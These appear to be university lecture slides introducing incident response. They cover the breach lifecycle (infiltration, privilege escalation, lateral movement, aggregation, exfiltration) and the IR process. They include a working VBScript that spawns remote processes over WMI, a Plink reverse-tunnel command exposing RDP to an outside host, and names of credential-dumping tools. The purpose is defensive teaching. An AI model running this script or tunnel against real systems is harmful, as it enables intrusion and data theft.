COMP SCI 355

Week 3
Intro to Incident Response
Professor Dr. Yan Chen &
Jibran Ilyas
Incident Response is basically “a fight
back” when an anomaly occurs in the
network. It’s essentially an organized
way of managing the aftermath of an
incident (security breach). Basic goals
are to contain the damage and
minimize the recovery time & costs
 Breach Lifecycle

1 2 3 4 5
PRIVILEGE LATERAL DATA DATA
INFILTRATION
ESCALATION MOVEMENT AGGREGATION EXFILTRATION
Infiltration

+ Spear Phishing Emails

+ Drive-By Attack (Web Exploits attacking website visitors)

+ Vulnerable Web Servers

+ Stolen Credentials and Access through the Front Door

+ Wireless Vulnerabilities & Man-in-the-Middle Attacks

+ Social Engineering (Physical Breach)

4
Infiltration can take place using remote access tools…

5
…. Infiltration Tactics

6
…. Or through web services exploitation

• SQL Injection
• Uploader Filetype Verification (upload shell
instead of jpeg)

• Cross Site Scripting (XSS)

• Web Application Vulnerabilities (zero days)

• Default Credentials (full admin access)

7
Privilege Escalation

+ Extraction of Domain Admin passwords via Cached Credentials on Desktops

+ Mimikatz, Pwdump, Fgdump, Powershell version of Password dumping tools

+ Windows Credentials Editor for pass-the-hash attacks

+ Phishing Credentials via Fake Outlook Webmail page

+ Lsass Process Memory Dump taken offline for extraction via Mimikatz

8
 Typical Pass The Hash Attack
Power:
Domain
Controllers 1. Bad guy targets workstations en masse
2. User running as local admin compromised,
Bad guy harvests credentials.
3. Bad guy uses credentials for lateral traversal
Data: 4. Bad guy acquires domain admin credentials
Servers and and associated privileges – privilege
Applications
escalation
5. Bad guy has direct or indirect access to
read/write/destroy data and systems in the
environment.
Access:
Users and
Workstations
Lateral Movement

+ Once Domain Admin credentials are gained, Internal Reconnaissance is done.

Tools like NMAP, IPscan and other system administration utilities utilized

+ Attackers leave backdoors to maintain access

+ Scheduled Tasks, Powershell, WMI (Windows Tools) used for lateral movement

+ Domain controllers, File Servers, POS Software Update Server, DVR Server,
WSUS Server, Remote Access Server, File Integrity Server, Microsoft SCCM,
other Security Products, etc. used for Lateral Movement

+ Basically, advanced Network Admin skills are utilized for Lateral Movement
e.g. Remote Desktop, DOS Commands, File Shares, etc.

10
Sample Lateral Movement Script (replaces PsExec.exe)

strComputer = wscript.arguments(0)
strAdmin = wscript.arguments(1)
strPassword = wscript.arguments(2)

Set objLocator = CreateObject("WbemScripting.SWbemLocator")

Set objService = objLocator.ConnectServer(strComputer,
"Root\cimv2", strAdmin,strPassword)

strExe = wscript.arguments(3)
Set objProcess = objService.Get("Win32_Process")
Set objProgram =
objProcess.Methods_("Create").InParameters.SpawnInstance_
objProgram.CommandLine = strExe

Set strShell = objService.ExecMethod("Win32_Process",

"Create", objProgram)

11
Data Aggregation

+ Custom Programs are executed to look for Database Servers, File Servers
and Important Machines, such as Developers Systems

+ Attackers first go through the process manually and then automate with scripts

+ One time heists like Database Extraction of PII is done usually with planning
e.g. Extract during Holidays, DDOS Attack to keep administrators busy, etc.

+ In credit card breaches, Keystroke Logging, Network Sniffing, RAM Dumping

are used for Data Aggregation.

+ In Nation State attacks, one of the most common pieces of data targeted is the
keystroke input typed by the victims.

12
Data Exfiltration

+ Exfiltration common on TCP ports 80 & 443 as they are allowed for web browsing

+ Chunked files (to evade DLP tools) used by the attackers

+ DNS Tunneling for Data Exfiltration (since DNS traffic allowed outbound)

+ Use of reverse tunneling tools e.g.

Plink.exe [email protected] –pw <password> –P 443 -2 -4 –T –N –C
–R 44489:127.0.0.1:3389

+ Exfiltration to legit sites like Google Docs to avoid detection

13
Incident Response Process

+ Scoping / Triage / Contracts

+ Onsite Interviews

+ Strategic Plan

+ Containment

+ Response (Collections & Analysis)

+ Remediation
Scoping / Triage / Contracts

+ Victim’s first discussion with IR Professionals to triage the incident

+ Understanding of the Environment affected and resource bandwidth discussions

+ Terms and Conditions of the Engagement (Timing, Access & Liabilities)

15
Interviews

+ Mostly done on the first day of Onsite with the Executive Team, IT Team and the
Security Team

+ Attempt to gain an understanding of the environment and how attackers might

have circumvented it

+ Access Procedures (Remote and Onsite) are discussed e.g. VPN access,
ability to connect own laptop in environment

16
Strategic Plan

+ A comprehensive planning is done with the gaols of timely containment, focused

investigation and fast recovery.

17
Containment

+ Decisions taken on how to do initial remediation

+ Considerations for tipping off attackers

+ Business Operations Considerations and resource bandwidth considerations.

18
Response

+ Volatile Data Collection and Disk Images Collection

+ Log Analysis (Firewall Logs, NetFlow, Web Proxy Logs, Web Server Logs, etc)

+ Deep Forensics Analysis on Disk Images and Memory Images

19
Remediation

+ Discussion on the priority and order of remediation steps post investigation

+ Long Term Resiliency Planning

+ Training for IR and Security Operation Staff

20
End of Week 3 Slides